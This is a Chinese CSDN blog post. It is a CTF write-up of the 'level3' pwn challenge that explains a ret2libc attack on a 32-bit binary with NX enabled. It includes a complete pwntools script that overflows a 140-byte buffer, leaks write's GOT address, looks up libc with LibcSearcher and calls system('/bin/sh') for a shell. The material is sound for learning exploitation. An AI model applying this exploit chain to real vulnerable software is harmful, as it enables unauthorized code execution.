level3学习ret2libc

最新推荐文章于 2023-12-08 19:59:16 发布
最新推荐文章于 2023-12-08 19:59:16 发布
阅读量289 收藏 1
点赞数 1
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30204577/article/details/105460143
版权

0x-1
忘了是哪里的题目了,好像是jarvisoj的,整理wp的时候当练习ret2libc了
0x00 常规文件检查

是一个32位的开启了堆栈不可执行的ELF文件。在这里插入图片描述

0x10 ida打开分析文件

​ 在左侧的function处并没有发现system函数,但是有一个vulnerable_function,在这里插入图片描述

打开main函数,f5反汇编后可以看到如下图所示的内容,即调用了vulnerable函数在这里插入图片描述

打开vul函数可以发现它使用write函数先输出了一句话,于是我们可以尝试通过泄漏write函数的真实地址然后通过LibcSearcher查找对应的libc,从而dump出libc里面的system函数与bin/sh地址

在这里插入图片描述
在这里插入图片描述从上图可以发现buf的长度为0x88h,然后我们还需要覆盖它的返回地址(r所指向的地方),这样之后就能到达我们设定的返回地址了,故我们所需要填入的垃圾数据长度为0x88+4=140

0x20exp

#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = "debug"
sh = process('./level3')
#以上为常规的操作,引入pwntools和LibcSearcher,然后设置日志等级为debug,这样会打印出终端获得的所有信息

le3 = ELF('./level3')
write_plt = le3.plt['write']
write_got = le3.got['write']
#引入ELF文件,这样可以方便的查找一些函数在plt,got的地址,就比如上边的write函数

vul_addr = 0x0804844B
#vul函数,是我们第发送第一次payload之后要返回的地方
sh.recv()
#接收文件输出的内容
payload = 'a'*140+p32(write_plt)+p32(vul_addr)+p32(1)+p32(write_got)+p32(4)
#0x88+4即将栈空间与返回地址覆盖 writeplt就是新设置的返回地址 vul是write后的返回地址 p32(1)是文件描述符,1为正常 got为write的参数,即要打印的内容 p32(4)是要打印的长度
sh.sendline(payload)

write_addr = u32(sh.recv()[:4])
#32位情况下,低四位不变化,接收,然后查找
libc = LibcSearcher('write',write_addr)
#查找对应的libc
libcbase = write_addr - libc.dump('write')
#根据base = 泄露的地址     函数在libc里面的偏移
system_addr = libcbase + libc.dump('system')
bin_addr = libcbase + libc.dump('str_bin_sh')
#通过libcbase与libcdump获取system与bin的真实地址。
print "get"
payload = flat(['a'*140,system_addr,0xdeadbeef,bin_addr])
#flat,可以理解成是格式化的意思,这样写省去了p32
sh.sendline(payload)
sh.interactive()
sh.close()

对于第一个payload中的write_plt,因为返回地址是需要是一段指令,而plt里面就是指令,got表中是地址,所以我们需要使用plt里面的内容。

TedLau.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 369
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
ret2libc2pwn 入门题
02-11
pwn 入门题
[pwn] 5.ROP-ret2libc
H4ppyD0g的博客
09-01 256
文章目录题目ret2libc1题目ret2libc2题目ret2libc3 题目ret2libc1 这里需要通过gets函数覆盖返回地址到system函数,并把/bin/sh作为system的参数。 由于是动态链接,所以需要把返回地址原本写system函数的地址改为system函数在plt表中的地址。 from pwn import * elf = ELF("./ret2libc1") sys_addr = elf.plt["system"] bin_sh_addr = next(elf.searc
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 236
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
03正则表达式
weixin_43841579的博客
10-29 4545
在Python中字符串的匹配方法用于完全匹配 s = 'hi csdn' print(s.find('csdn')) #3 ret = s.replace('hi','hello') print(ret) #hello csdn print(s.split(' ')) #['hi', 'csdn'] 正则表达式用于进行字符串的模糊匹配,在Python中通过引入re模块实现 import re...
正则3 re的高级用法:search sub findall split
小屋
03-04 4658
search findall sub split search 查找想要查找的东西,但只匹配第一个符合要求的数据 import re ret = re.search(r"\d+","阅读次数为 999,点赞数为100") print (ret.group()) findall 查找匹配到所有需要的数据 import re ret = re.findall(r"\d+","python=9999...
golang map 应用实例与解析
weixin_38387929的博客
08-11 2703
map 简介 map 是 go 中的内置类型,它将一个值与一个键关联起来,可以使用相应的建检索值。 使用注意事项 map 是无序的,它不是通过index获取,而必须通过 key 获取 map 长度不固定,内置len() 函数适用,cap()函数不适用 同一个 map中key 必须保证唯一 map 的 vlaue 值可以是任意类型 map 是引用类型 golang中的map声明非常简单,我们用map关键字表示声明一个map,然后在方括号内填上key的类型,方括号外填上value的类型。 var m map
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2-libc3-puts
最新发布
04-01
ret2-libc3-puts
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
浅谈rop-ret2libc原理以及解答-以攻防世界level3为例
pointerr的博客
08-05 527
栈溢出-rop-libc 0x01、got表和plt表与动态链接、绑定延迟(重点理解) GOT概述 1、当在程序中引用某个共享库中的符号时,编译链接阶段并不知道这个符号的具体位置,只有等到动态链接器将所需要的共享库加载进内存后,也就是在运行阶段,符号的地址才会最终确定。因此,需要有一个数据结构来保存符号的绝对地址,这就是GOT表的作用,GOT表中每项保存程序中引用其他符号的绝对地址。这样,程序就可以通过引用GOT表来获得某个符号的地址 2、在X86结构中,GOT表的前三项保留,用于保存特殊的数据结构地址,其
python基础数据类型
weixin_34351321的博客
09-20 162
一.什么是数据类型? 二.基础数据类型。 2.1数字int。 2.2布尔值bool。 2.3字符串str。 2.4元祖tuple。 2.5列表list。 2.6字典dict。 2.6集合set。 三.python基础初始总结 四.其他 一.什么是数据类型? 什么是数据类型?   我们人类可以很容易的分清数字与字符的区别,但是计算机并不能呀,计算机虽然很强大...
MyBatis学习
liuwei0376的专栏
03-12 235
简介 相比ORM领域的Hibernate来说, mybatis是一个半自动化的持久化框架. 相比于前者严格的封装, mybatis则灵活的多, 提供给开发者更多的入口去定制化你的映射规则. MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架。MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集。MyBatis 可以对配置和原生Map使用简单的 XM...
内核调试方法 二
bugouyonggan的专栏
02-19 2099
九  KGDB kgdb提供了一种使用 gdb调试 Linux 内核的机制。使用KGDB可以象调试普通的应用程序那样,在内核中进行设置断点、检查变量值、单步跟踪程序运行等操作。使用KGDB调试时需要两台机器,一台作为开发机(Development Machine),另一台作为目标机(Target Machine),两台机器之间通过串口或者以太网口相连。串口连接线是一根RS-232接口的电缆,
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 4968
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1680
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
22_装饰器、带参数的装饰器、多个装饰器装饰一个函数
weixin_30672295的博客
02-05 164
一、装饰器的执行流程 1 def wrapper(func): 2 def inner(*args,**kwargs): 3 ret = func(*args,**kwargs) 4 return ret 5 return inner 6 7 @wrapper #fun = wrapper(fun) 8 ...
5分钟轻松学Python:4行代码写一个爬虫
博文视点(北京)官方博客
12-31 912
编程不是科学,而是一门手艺 Python 具有丰富的解析库和简洁的语法,所以很适合写爬虫。这里的爬虫指的是爬取网页的“虫子”。简而言之,爬虫就是模拟浏览器访问网页,然后获取内容的程序。 爬虫工程师是个很重要的岗位。爬虫每天爬取数以亿计的网页,供搜索引擎使用。爬虫工程师们当然不是通过单击鼠标右键并另存的方式来爬取网页的,而会用爬虫“伪装”成真实用户,去请求各个网站,爬取网页信息。 本文选自《Python基础视频教程》一书,每一小节都给出了视频讲解,配合视频微课带你快速入门Python。 ...
pwn ret2libc原理
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值